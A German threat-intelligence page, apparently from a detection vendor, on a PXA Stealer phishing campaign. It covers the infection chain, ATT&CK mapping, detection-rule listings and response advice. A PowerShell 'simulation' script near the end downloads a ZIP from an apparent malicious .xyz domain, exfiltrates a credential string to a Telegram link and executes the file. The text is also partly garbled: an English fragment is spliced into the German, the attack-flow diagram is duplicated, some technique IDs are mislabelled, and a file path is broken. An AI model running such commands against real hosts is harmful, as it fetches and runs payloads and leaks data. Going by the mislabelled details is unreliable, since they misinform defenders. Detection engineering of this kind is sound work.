SOC Prime Bias: Mittel

31 März 2026 16:58
newspaper icon CyberProof

Von Phishing bis Exfiltration: Ein detaillierter Einblick in den PXA Stealer

Author Photo
Ruslan Mikhalov Leiter der Bedrohungsforschung bei SOC Prime linkedin icon Folgen
Von Phishing bis Exfiltration: Ein detaillierter Einblick in den PXA Stealer
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Der Bericht beschreibt einen starken Anstieg der PXA Stealer-Aktivitäten, die auf Finanzorganisationen Anfang 2026 abzielen. Bedrohungsakteure verbreiten bösartige ZIP-Archive über Phishing-E-Mails und stützen sich auf eine mehrstufige Infektionskette, die legitime Systemtools und einen umbenannten Python-Interpreter missbraucht. Sobald aktiv, stiehlt die Malware Browser-Anmeldedaten, gespeicherte Passwörter und Krypto-Wallet-Daten und exfiltriert diese gesammelten Informationen über Telegram. Die Kampagne hebt hervor, wie sich die Betreiber nach früheren Störungen anderer Infostealer-Ökosysteme angepasst haben.

Untersuchung

Forscher bei CyberProof rekonstruierten die vollständige Angriffskette, die mit einer Phishing-E-Mail begann, die ein bösartiges Pumaproject.zip-Archiv lieferte, und mit der Exfiltration über Telegram endete. Ihre Analyse identifizierte den Missbrauch von Certutil zum Entschlüsseln, eine als Bild getarnte WinRAR-Kopie zur Entpackung, einen versteckten Dots-Ordner und einen umbenannten svchost.exe Python-Interpreter, der verwendet wurde, um ein verschleiertes Skript mit einer Bot-ID zu starten. Die Persistenz wird durch einen Registrierungseintrag aufrechterhalten. picture.png for extraction, a hidden Dots folder, and a renamed svchost.exe Python interpreter used to launch an obfuscated script tied to a bot identifier. Persistence is maintained through a registry value entry.

Minderung

Verteidiger sollten verdächtige Archivanhänge identifizieren, die Skriptausführung und bekannte LOLBins von unerwarteten Pfaden überwachen und ausgehenden Datenverkehr zu Telegram sowie ungewöhnliche TLDs wie .shop and .xyz. Sicherheits-Teams sollten auch E-Mail-Gateways härten und strenge Ausführungskontrollen für Office-Dokumente und skriptbasierte Inhalte anwenden.

Reaktion

Wenn der PXA Stealer entdeckt wird, isolieren Sie den betroffenen Host, erfassen Sie flüchtige Beweise und suchen Sie nach den referenzierten Dateiartefakten und Registrierungsänderungen. Entfernen Sie bösartige Dateien, beenden Sie betroffene Prozesse und setzen Sie alle kompromittierten Anmeldeinformationen zurück. Infolgedessen sollten Teams eine breitere Bedrohungssuche nach übereinstimmenden Indikatoren in der Umgebung durchführen und relevante Stakeholder benachrichtigen.

<div class="wp-block-socprime-category-attack-flow attack-flow-class" data-title="Attack Flow" data-attack-flow="graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#ffeb99 classDef process fill:#ffcc99 classDef persistence fill:#c2f0c2 classDef exfil fill:#f4c2c2 %% Node definitions action_phishing["<b>Action</b> – <b>T1566.001 Phishing: Spearphishing Attachment</b><br/>Description: Email with malicious ZIP (Pumaproject.zip) containing Document.docx.exe."] class action_phishing action file_zip["<b>File</b> – Pumaproject.zip<br/><b>Contains</b>: Document.docx.exe"] class file_zip file action_user_exec["<b>Action</b> – <b>T1204.002 User Execution: Malicious File</b><br/>Description: Victim opens the attached executable."] class action_user_exec action process_malicious_exe["<b>Process</b> – Document.docx.exe"] class process_malicious_exe process action_execution_hijack["<b>Action</b> – <b>T1574 Hijack Execution Flow</b><br/>Description: Launches inter.cmd and uses certutil to decode payload from Shodan.pdf."] class action_execution_hijack action process_inter_cmd["<b>Process</b> – inter.cmd"] class process_inter_cmd process tool_certutil["<b>Tool</b> – certutil.exe<br/><b>Purpose</b>: Decode base64 content"] class tool_certutil tool file_shodan_pdf["<b>File</b> – Shodan.pdf<br/><b>Contains</b>: Base64 encoded payload"] class file_shodan_pdf file action_defense_embedded["<b>Action</b> – <b>T1027.009 Embedded Payloads</b><br/>Description: Payload hidden inside PDF file."] class action_defense_embedded action action_decode["<b>Action</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/>Description: certutil decodes the payload."] class action_decode action action_hidden_dir["<b>Action</b> – <b>T1564.001 Hidden Files and Directories</b><br/>Description: Malware creates hidden folder "Dots" for intermediate files."] class action_hidden_dir action file_hidden_dir["<b>File</b> – Dots (hidden directory)"] class file_hidden_dir file action_relocate["<b>Action</b> – <b>T1070.010 Indicator Removal: Relocate Malware</b><br/>Description: Moves malicious files into hidden "Dots" directory."] class action_relocate action action_compression["<b>Action</b> – <b>T1027.015 Compression</b><br/>Description: WinRAR disguised as picture.png extracts password‑protected archive (password shodan2201)."] class action_compression action tool_winar["<b>Tool</b> – WinRAR (renamed picture.png)"] class tool_winar tool file_archive["<b>File</b> – Password protected archive (shodan2201)"] class file_archive file action_rc_script["<b>Action</b> – <b>T1037.004 RC Scripts</b><br/>Description: Portable Python dropped, renamed to svchost.exe and executed with $BOT_ID argument."] class action_rc_script action process_svc_host["<b>Process</b> – svchost.exe (malicious Python interpreter)"] class process_svc_host process action_active_setup["<b>Action</b> – <b>T1547.014 Active Setup</b><br/>Description: Registry entry added to run svchost.exe at startup."] class action_active_setup action action_com_hijack["<b>Action</b> – <b>T1546.015 COM Hijacking</b><br/>Description: COM hijacking registry entry created for automatic execution."] class action_com_hijack action action_cred_browser["<b>Action</b> – <b>T1555.003 Credentials from Web Browsers</b><br/>Description: Injects into browsers to steal passwords, cookies, crypto wallet data."] class action_cred_browser action action_cred_cookies["<b>Action</b> – <b>T1539 Steal Web Session Cookie</b><br/>Description: Extracts web session cookies for reuse."] class action_cred_cookies action action_keylogging["<b>Action</b> – <b>T1056.001 Input Capture: Keylogging</b><br/>Description: Captures keystrokes from the user."] class action_keylogging action action_exfil_telegram["<b>Action</b> – <b>T1567 Exfiltration Over Web Service</b><br/>Description: Sends collected data to attacker‑controlled Telegram channels."] class action_exfil_telegram exfil action_exfil_c2["<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b>

graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#ffeb99 classDef process fill:#ffcc99 classDef persistence fill:#c2f0c2 classDef exfil fill:#f4c2c2 %% Node definitions action_phishing[„<b>Action</b> – <b>T1566.001 Phishing: Spearphishing Attachment</b><br/>Description: Email with malicious ZIP (Pumaproject.zip) containing Document.docx.exe.“] class action_phishing action file_zip[„<b>File</b> – Pumaproject.zip<br/><b>Contains</b>: Document.docx.exe“] class file_zip file action_user_exec[„<b>Action</b> – <b>T1204.002 User Execution: Malicious File</b><br/>Description: Victim opens the attached executable.“] class action_user_exec action process_malicious_exe[„<b>Process</b> – Document.docx.exe“] class process_malicious_exe process action_execution_hijack[„<b>Action</b> – <b>T1574 Hijack Execution Flow</b><br/>Description: Launches inter.cmd and uses certutil to decode payload from Shodan.pdf.“] class action_execution_hijack action process_inter_cmd[„<b>Process</b> – inter.cmd“] class process_inter_cmd process tool_certutil[„<b>Tool</b> – certutil.exe<br/><b>Purpose</b>: Decode base64 content“] class tool_certutil tool file_shodan_pdf[„<b>File</b> – Shodan.pdf<br/><b>Contains</b>: Base64 encoded payload“] class file_shodan_pdf file action_defense_embedded[„<b>Action</b> – <b>T1027.009 Embedded Payloads</b><br/>Description: Payload hidden inside PDF file.“] class action_defense_embedded action action_decode[„<b>Action</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/>Description: certutil decodes the payload.“] class action_decode action action_hidden_dir[„<b>Action</b> – <b>T1564.001 Hidden Files and Directories</b><br/>Description: Malware creates hidden folder „Dots“ for intermediate files.“] class action_hidden_dir action file_hidden_dir[„<b>File</b> – Dots (hidden directory)“] class file_hidden_dir file action_relocate[„<b>Action</b> – <b>T1070.010 Indicator Removal: Relocate Malware</b><br/>Description: Moves malicious files into hidden „Dots“ directory.“] class action_relocate action action_compression[„<b>Action</b> – <b>T1027.015 Compression</b><br/>Description: WinRAR disguised as picture.png extracts password‑protected archive (password shodan2201).“] class action_compression action tool_winar[„<b>Tool</b> – WinRAR (renamed picture.png)“] class tool_winar tool file_archive[„<b>File</b> – Password protected archive (shodan2201)“] class file_archive file action_rc_script[„<b>Action</b> – <b>T1037.004 RC Scripts</b><br/>Description: Portable Python dropped, renamed to svchost.exe and executed with $BOT_ID argument.“] class action_rc_script action process_svc_host[„<b>Process</b> – svchost.exe (malicious Python interpreter)“] class process_svc_host process action_active_setup[„<b>Action</b> – <b>T1547.014 Active Setup</b><br/>Description: Registry entry added to run svchost.exe at startup.“] class action_active_setup action action_com_hijack[„<b>Action</b> – <b>T1546.015 COM Hijacking</b><br/>Description: COM hijacking registry entry created for automatic execution.“] class action_com_hijack action action_cred_browser[„<b>Action</b> – <b>T1555.003 Credentials from Web Browsers</b><br/>Description: Injects into browsers to steal passwords, cookies, crypto wallet data.“] class action_cred_browser action action_cred_cookies[„<b>Action</b> – <b>T1539 Steal Web Session Cookie</b><br/>Description: Extracts web session cookies for reuse.“] class action_cred_cookies action action_keylogging[„<b>Action</b> – <b>T1056.001 Input Capture: Keylogging</b><br/>Description: Captures keystrokes from the user.“] class action_keylogging action action_exfil_telegram[„<b>Action</b> – <b>T1567 Exfiltration Over Web Service</b><br/>Description: Sends collected data to attacker‑controlled Telegram channels.“] class action_exfil_telegram exfil action_exfil_c2[„<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/>Description: Uses Telegram as C2 and exfiltration channel.“] class action_exfil_c2 exfil %% Connections action_phishing –>|delivers| file_zip file_zip –>|executes| action_user_exec action_user_exec –>|runs| process_malicious_exe process_malicious_exe –>|launches| action_execution_hijack action_execution_hijack –>|spawns| process_inter_cmd process_inter_cmd –>|uses| tool_certutil tool_certutil –>|decodes| file_shodan_pdf file_shodan_pdf –>|contains| action_defense_embedded action_defense_embedded –>|triggers| action_decode action_decode –>|creates| action_hidden_dir action_hidden_dir –>|creates| file_hidden_dir action_hidden_dir –>|stores| action_relocate action_relocate –>|moves files to| file_hidden_dir action_relocate –>|leads to| action_compression action_compression –>|uses| tool_winar tool_winar –>|extracts| file_archive file_archive –>|provides| action_rc_script action_rc_script –>|executes| process_svc_host process_svc_host –>|establishes| action_active_setup process_svc_host –>|establishes| action_com_hijack process_svc_host –>|enables| action_cred_browser process_svc_host –>|enables| action_cred_cookies process_svc_host –>|enables| action_keylogging action_keylogging –>|feeds data to| action_exfil_telegram action_cred_browser –>|feeds data to| action_exfil_telegram action_cred_cookies –>|feeds data to| action_exfil_telegram action_exfil_telegram –>|uses channel| action_exfil_c2

Angriffsablauf

Erkennungen

Systemprozesse, die von unüblichen Pfaden ausgeführt werden (via process_creation)

SOC Prime Team
31. Mar 2026

Anzeigen

Verdächtige Command and Control durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (via dns)

SOC Prime Team
31. Mar 2026

Anzeigen

Verdächtige Ausführung aus öffentlichem Benutzerprofil (via process_creation)

SOC Prime Team
31. Mar 2026

Anzeigen

Ungewöhnliche Erweiterung eines ausführbaren Binaries (via process_creation)

SOC Prime Team
31. Mar 2026

Anzeigen

Verdächtige Dateien im öffentlichen Benutzerprofil (via file_event)

SOC Prime Team
31. Mar 2026

Anzeigen

Verwendung von Certutil zur Datenkodierung und Zertifikatsoperationen (via cmdline)

SOC Prime Team
31. Mar 2026

Anzeigen

IOCs (HashMd5) zur Erkennung: Vom Phishing bis zur Exfiltration: Ein tiefer Einblick in PXA Stealer Teil 2

SOC Prime AI Regeln
31. Mar 2026

Anzeigen

IOCs (DestinationIP) zur Erkennung: Vom Phishing bis zur Exfiltration: Ein tiefer Einblick in den PXA Stealer

SOC Prime AI Regeln
31. Mar 2026

Anzeigen

IOCs (HashMd5) zur Erkennung: Vom Phishing bis zur Exfiltration: Ein tiefer Einblick in PXA Stealer Teil 1

SOC Prime AI Regeln
31. Mar 2026

Anzeigen

IOCs (SourceIP) zur Erkennung: Vom Phishing bis zur Exfiltration: Ein tiefer Einblick in PXA Stealer

SOC Prime AI Regeln
31. Mar 2026

Anzeigen

IOCs (HashSha256) zur Erkennung: Vom Phishing bis zur Exfiltration: Ein tiefer Einblick in PXA Stealer

SOC Prime AI Regeln
31. Mar 2026

Anzeigen

Erkennung der Ausführungsaktivitäten von PXA Stealer [Windows-Prozesserstellung]

SOC Prime AI Regeln
31. Mar 2026

Anzeigen

Erkennen der ausgehenden Verbindungen des PXA Stealers [Windows-Netzwerkverbindung]

SOC Prime AI Regeln
31. Mar 2026

Anzeigen

Simulationsausführung

Voraussetzung: Der Telemetrie- und Basislinien-Pre-flight-Check muss bestanden sein.

Begründung: In diesem Abschnitt werden die genauen Ausführungen der Angreifertechnik (TTP) detailliert beschrieben, die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die exakte Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

  • Angriffsablauf & Befehle:
    Der Bedrohungsakteur setzt den PXA Stealer auf einem kompromittierten Windows-Host ein. Nachdem der Benutzer unwissentlich das anfängliche bösartige Binary ausführt (T1204.002), startet der Stealer ein PowerShell-Snippet, das:

    1. Ein bösartiges ZIP herunterlädt von der fest codierten Domain downloadtheproject.xyz (T1202 – indirekte Befehlsausführung).
    2. Die gesammelten Daten exfiltriert durch Posten einer Nachricht auf einem Telegram-Kanal via t.me (T1559.002 – Phishing-Link).
    3. Optional eine bösartige COM-Komponente lädt, um Persistenz zu erreichen (T1127.002).

    Beide ausgehenden HTTP GET-Anfragen erzeugen die DestinationDomain Felder, die die Sigma-Regel überwacht und dadurch einen Alarm auslöst.

  • Regressionstestskript:

    # PXA Stealer-Simulation – löst die Erkennungsregel aus
$tmpZip = "$env:TEMPpayload.zip"
$tmpMsg = "$env:TEMPsteal.txt"

# 1. Herunterladen des bösartigen ZIP von der ersten bösartigen Domain
Invoke-WebRequest -Uri "https://downloadtheproject.xyz/malware.zip" -OutFile $tmpZip -UseBasicParsing

# 2. Simulieren der Datenexfiltration über den Telegram-Link
$payload = "User credentials: admin / Pass123!"
Set-Content -Path $tmpMsg -Value $payload -Encoding ASCII
Invoke-WebRequest -Uri "https://t.me/stealchannel?text=$( [uri]::EscapeDataString($payload) )" -UseBasicParsing

# 3. (Optional) Laden eines Dummy-COM-Objekts zur Emulation von T1127.002
try {
    $com = New-Object -ComObject "Shell.Application"
    $com.ShellExecute($tmpZip, "", "", "open", 0) | Out-Null
} catch {
    # Ignore errors – this is only for telemetry
}

  • Säuberungsbefehle:

    # Entfernen von Artefakten, die durch die Simulation erstellt wurden
Remove-Item -Path $tmpZip -Force -ErrorAction SilentlyContinue
Remove-Item -Path $tmpMsg -Force -ErrorAction SilentlyContinue

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten